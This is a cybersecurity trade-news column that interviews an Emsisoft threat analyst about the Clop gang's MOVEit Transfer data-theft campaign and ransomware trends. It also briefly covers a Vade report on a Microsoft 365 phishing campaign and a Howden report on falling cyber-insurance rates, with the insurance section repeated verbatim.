The Gately Report: Emsisoft Analyst Shines Light on Clop Ransomware Gang's MOVEit Transfer Attacks
Plus, Vade discovers a new Microsoft 365 phishing attack that could impact business’ most sensitive data.
Lars Hallstrom/Shutterstock
Channel Futures: In addition to your role with Emsisoft, you’re an advisory board member of the Ransomware Harms project. What does it do?
Brett Callow: That’s the Royal United Services Institute Ransomware Harms project and it’s looking at, as the name suggests, the actual harms that ransomware causes both to organizations who are directly impacted and individuals who are indirectly impacted. In the short term, the objectives really center around trying to understand the real impacts of ransomware, because that’s actually a subject that’s been too little explored.
And attacks are very often not fully disclosed. They’re not reported, and even incident response reports can be wrapped up and obscured by attorney-client privilege. So there really isn’t as much information available in relation to attacks as we’d like it to be or the lasting impacts that they can have.
CF: What’s the overall threat landscape looking like so far this year? Are there many differences from last year?
BC: Yes, as far as we can tell, ransomware, which is probably the threat that’s on everyone’s mind, actually dipped a little last year. This year it seems to be back with a vengeance. The reasons for that aren’t clear, but it’s likely due to a variety of factors, including Russia’s invasion of Ukraine.
CF: Victims of the MOVEit Transfer attacks continue wracking up. Are you seeing any patterns in terms of who’s been targeted?
BC: It’s very hard to make out any patterns at the moment because it’s still very early days. And we know that there were about 2,500 MOVEit instances exposed to the internet. Clop claimed to have stolen data from hundreds of MOVEit users. And so far we know about roughly 200 of those organizations. Who the rest of them are or what type of data was obtained, we simply don’t know.
CF: We know about Clop’s activities. What other groups have been active this year?
BC: There have been lots of active groups this year. One noticeable development I think is that we have seen a fracturing of the ransomware-as-a-service (RaaS) model. The big operations have received considerable attention from law enforcement and sites are being seized. Other elements of the supply chains have been disrupted. And as a result, I think those big, flashy, noisy operations are less appealing than they once were.
And we are now seeing groups operating under smaller banners and sometimes quite ephemerally, too. The fracturing doesn’t make [the threat landscape] any better necessarily, that’s for sure. And it does make it harder to track and identify who’s doing what, which is very likely what they’re hoping to achieve.
CF: Why does it same like so many attacks are successful?
BC: We still see a lot of organizations not getting the basics right. They aren’t patching promptly. They aren’t using multifactor authentication (MFA) everywhere it could and should be used. And there’s no such thing as a sure thing. You can never be completely immune to cyberattacks. But if you get those basics right, you can significantly reduce the likelihood of becoming the next victim.
CF: If more organizations were doing at least some of the basics you’re talking about, could that list of MOVEit Transfer attack victims potentially be shorter?
BC: No. That was the exploitation of a zero day and they are very hard to secure against. So getting things right, in this case, probably wouldn’t have made that much difference. That said, there are things that organizations can do to defend against these attacks or at least minimize their exposure. For example, keeping the data on the appliances when it’s no longer needed. Data minimization on these devices could be one route to reducing your exposure.
CF: How is Emsisoft helping partners like MSPs and resellers protect themselves and their customers?
BC: We adapt our products as needed to keep pace with a rapidly evolving threat landscape. We have done that for years and we are continuing to do it today. We fairly recently released an extension to our products, which enables threats to be identified sooner than they otherwise would. And again, blocking threats very, very early in the attack chain reduces the likelihood that they will eventually morph into a successful attack.
CF: We’re deep into summer and into the second half of 2023. What are we likely to see in the months ahead? Are certain months/times of the year more active/less active in terms of cybercrime?
BC: I think we’ll see more of the same. I don’t think we will see any significant changes for the rest of the year. And there is no reason to believe that the number of attacks will significantly increase or decrease. That said, some threats are seasonal. For example, the number of schools that are compromised by ransomware increases significantly in Q3. We think that is because the attackers have compromised the networks earlier in the year, but wait until kids are back in school or just about to go back into school before they deploy the ransomware. That way, the districts are going to be under more pressure to resolve it quickly. They’re not going to have the summer to recover at their leisure, and that may mean they’re more likely to pay.
CF: Could it be months or many months before we have a clearer picture of the full extent of the MOVEit Transfer attacks?
BC: We will certainly get a better understanding of the scope of the MOVEit incident and its impact. I doubt if we will ever have the complete picture though. Organizations do not always disclose incidents even if they’re legally obliged to. They sometimes don’t. And there’s no reason to believe there will be any difference in this case.
CF: What can partners expect from Emsisoft during the remainder of 2023?
BC: I would say more of the same. We constantly update our products and that will continue. Emsisoft aims to provide our partners with the best possible tools to protect their clients and also with the best monetization options.
In other cybersecurity news …
Vade‘s latest research highlights a new Microsoft 365 phishing attack involving malicious HTML files.
In an attack, the victim receives a malicious HTML file as an email attachment, which, if opened, creates a phishing page impersonating Microsoft 365 in the victim’s web browser. If the victim enters their credentials in the fake form on the phishing page, the attackers can harvest those credentials.
Given the popularity of Microsoft 365 in the business world, the likelihood of an account being a corporate account is high, according to Vade. This means that if an attacker gets a hold of credentials, they could then get access to business’ most sensitive data.
While phishing attacks impersonating Microsoft 365 are nothing new, what’s unique with this incident is the involvement of both the malicious domain eevilcorp[.]online and an application called Hawkeye, which may or may not be related to the HawkEye malware kit, commonly sold as a keylogger and stealer on various hacking forums. The relation between the two has not been confirmed, but did raise Vade researchers’ eyebrows.
Vade isn’t able to identify the number or specifics about anyone that falls for the scam as it does not have access to the platform accounts the attackers are using.
Romain Basset, director of customer services at Vade, said anyone could be vulnerable to this attack.
“Most victims of phishing scams simply make an honest mistake because the attackers have done a good job of looking like a reputable site, often posing as a well-known brand like Microsoft,” he said. “First and foremost, organizations should make sure their email users are trained to be on the lookout for phishing scams. Phishing awareness training is something that every organization should require for their email users. Organizations should also use technology like email security tools to filter out phishing and spear phishing attacks before they make it to their users’ inboxes.”
Howden, the international insurance broker, has released its third annual report on cyber insurance, which shows cyber insurance rates fell by 10% in June compared to a year earlier, resulting from fewer than expected claims.
The first half of 2023 saw a significant rise in ransomware attacks, but disclosures from a number of carriers in the first quarter suggest this has not yet been accompanied by a corresponding rise in claims, according to the report.
This points to the efficacy of risk controls in making companies more resilient and supporting a more stable cyber insurance market. Conditions are now relenting, and buyers that have the correct risk controls in place are being rewarded with more favorable pricing and terms.
This puts the market on a sound footing for growth, according to Howden. However, the report shows that more work needs to be done if the market is to meet the growing demands of clients worldwide. By overcoming potential limitations around systemic risk, penetration and capital, the cyber insurance market has an unparalleled opportunity to grow.
Pricing increases in recent years, from 2020 onwards especially, have driven the growth of the cyber insurance market, but these tailwinds for insurers are now unwinding or even reversing in certain areas, according to Howden. Whereas annual rate increases of more than 100% were recorded during the first half of last year, the corresponding period in 2023 has seen flat renewals or even decreases in recent months as pricing has come off historical highs.
“Having navigated the early phases of development that often come with new, fast growing lines of business, the cost of cyber insurance is now more commensurate with loss costs following the recent correction,” said Dan Leahy, Howden’s associate director. “While the first half of 2023 has seen pricing decline, the sustainability of this trend remains uncertain given the pervasive threat environment. Rates nevertheless cannot be relied upon to drive market expansion to the extent that they have recently, requiring ambitious plans for exposure growth. Penetrating new territories and company demographics is therefore pivotal to realizing the full potential of cyber insurance.”
Howden, the international insurance broker, has released its third annual report on cyber insurance, which shows cyber insurance rates fell by 10% in June compared to a year earlier, resulting from fewer than expected claims.
The first half of 2023 saw a significant rise in ransomware attacks, but disclosures from a number of carriers in the first quarter suggest this has not yet been accompanied by a corresponding rise in claims, according to the report.
This points to the efficacy of risk controls in making companies more resilient and supporting a more stable cyber insurance market. Conditions are now relenting, and buyers that have the correct risk controls in place are being rewarded with more favorable pricing and terms.
This puts the market on a sound footing for growth, according to Howden. However, the report shows that more work needs to be done if the market is to meet the growing demands of clients worldwide. By overcoming potential limitations around systemic risk, penetration and capital, the cyber insurance market has an unparalleled opportunity to grow.
Pricing increases in recent years, from 2020 onwards especially, have driven the growth of the cyber insurance market, but these tailwinds for insurers are now unwinding or even reversing in certain areas, according to Howden. Whereas annual rate increases of more than 100% were recorded during the first half of last year, the corresponding period in 2023 has seen flat renewals or even decreases in recent months as pricing has come off historical highs.
“Having navigated the early phases of development that often come with new, fast growing lines of business, the cost of cyber insurance is now more commensurate with loss costs following the recent correction,” said Dan Leahy, Howden’s associate director. “While the first half of 2023 has seen pricing decline, the sustainability of this trend remains uncertain given the pervasive threat environment. Rates nevertheless cannot be relied upon to drive market expansion to the extent that they have recently, requiring ambitious plans for exposure growth. Penetrating new territories and company demographics is therefore pivotal to realizing the full potential of cyber insurance.”
It’s doubtful we’ll ever know the full extent of the Clop ransomware gang’s massive MOVEit Transfer attacks.
That’s according to Brett Callow, ransomware expert and threat analyst at Emsisoft. He’s been tracking the attacks since the start, including all of the organizations Clop has listed as victims.
Emsisoft is a New Zealand-based endpoint protection company that makes antivirus and anti-malware solutions. It has reseller and MSP partners across the globe.
Emsisoft’s Brett Callow
“My research highlights the direction the threat landscape is taking,” Callow said. “And obviously we have to fine-tune our products to take account of that. Threats aren’t the same all the time. Defenses can’t be the same all the time either.”
Clop Ransomware Gang Victims Increasing Daily
The number of MOVEit Transfer attack victims grows by the day. The Clop ransomware gang claims to have stolen data from hundreds of MOVEit Transfer users, and at least 200 organizations have been identified, ranging from U.S. government agencies, to the California Public Employees’ Retirement System (CalPER) and the California State Teachers Retirement System (CalSTRS), EY, Shell and Cadence Bank.
The number of individuals whose personal information was compromised now exceeds 17.5 million.
Callow said the extent and the scope of this incident is “quite surprising.”
“We are potentially looking at hundreds of organizations here that have lost data, sometimes directly from their own MOVEit installations and sometimes indirectly through the MOVEit installations of their providers, service providers and business partners,” he said. “Clop has been releasing data in some of the cases. I’ve not accessed that data, so I can’t tell you how much of it there is or exactly what it is other than it’s there. And there is now a huge amount of information on that [Clop] site that can be accessed by other cybercriminals and used for their own nefarious purposes, but may also use some of the data that they have stolen for phishing schemes to lure in more victims.”
Scroll through our slideshow above for more from Callow and more cybersecurity news.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn. |
About the Author(s)
You May Also Like